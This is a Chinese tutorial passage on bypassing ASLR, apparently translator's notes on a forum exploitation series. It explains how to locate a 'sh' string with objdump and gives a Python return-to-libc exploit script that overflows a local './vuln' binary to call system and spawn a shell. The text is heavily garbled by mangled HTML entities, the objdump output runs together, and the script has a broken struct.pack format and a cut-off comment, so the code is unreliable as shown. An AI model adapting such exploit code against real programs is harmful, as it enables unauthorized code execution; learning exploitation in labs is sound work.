绕过ASLR - 第一部分

什么是 ASLR?

地址空间布局随机化&＃xff08;ASLR&＃xff09;是随机化的利用缓解技术:

       堆栈地址

       堆地址

       共享库地址

一旦上述地址被随机化&＃xff0c;特别是当共享库地址被随机化时&＃xff0c;我们采取的绕过NX bit的方法不会生效&＃xff0c;因为攻击者需要知道libc基地址。但这种缓解技术并不完全是万无一失的&＃xff0c;因此在这篇文章中我们可以看到如何绕过共享库地址随机化&＃xff01;

原文地址&＃xff1a;https://bbs.pediy.com/thread-217107.htm

也许已经有人发现了&＃xff0c;这个系列没有系列五……其实是五太麻烦了&＃xff0c;限制太多&＃xff0c;不太好写&＃xff0c;所以就没有了&＃xff0c;也许以后会有

这个绕过ASLR的技巧非常有效&＃xff0c;作者和译者也讲的非常清楚&＃xff0c;改起来也非常清晰&＃xff0c;唯一有点困难的地方&＃xff0c;就是所谓的system_arg的地址的获取&＃xff0c;这里作者说的比较模糊&＃xff0c;第四和第五中也有同样的问题&＃xff0c;我结合我的调试来说一下。

其实作者在之前的exp.py中是有提到的&＃xff0c;这里的system_arg&＃xff0c;其实需要的是环境变量sh的字符串&＃xff0c;也就是“sh”字符串的地址。在我们这里&＃xff0c;使用objdump可以获得

jourluohua&＃64;jourluohua-virtual-machine:~/work/test6$ objdump -s vuln | grep sh
Contents of section .gnu.hash:8048598 03000000 01000200 2f62696e 2f736800 ......../bin/sh.0080 63746f72 00617267 63007368 6f727420 ctor.argc.short 00c0 69740073 686f7274 20696e74 0073697a it.short int.siz00d0 65747970 65007368 656c6c00 etype.shell.

我们使用第一个地址&＃xff0c;也就是所谓的0x8048698后边这一串。这个代表从0x8048598开始的字符串&＃xff0c;因此“s”的地址是0x8048598&＃43;12&＃43;1&＃61;0x80485a5

将这个地址和disassemble获得的system和exit地址都填进去&＃xff0c;就可以获得成功了。

老规矩&＃xff0c;附上我的exp.py代码&＃xff1a;

1 #exp.py
2 #!/usr/bin/env python
3 import struct
4 from subprocess import call
5 system &＃61; 0x8048370
6 exit &＃61; 0x8048390
7 system_arg &＃61; 0x80485a5 #Obtained from hexdump output of e$
8 #endianess convertion
9 def conv(num):
10 return struct.pack("",num)#ystem &＃43; exit &＃43; system_arg
11 buf &＃61; "A" * 272
12 buf &＃43;&＃61; conv(system)
13 buf &＃43;&＃61; conv(exit)
14 buf &＃43;&＃61; conv(system_arg)
15 print "Calling vulnerable program"
16 call(["./vuln", buf])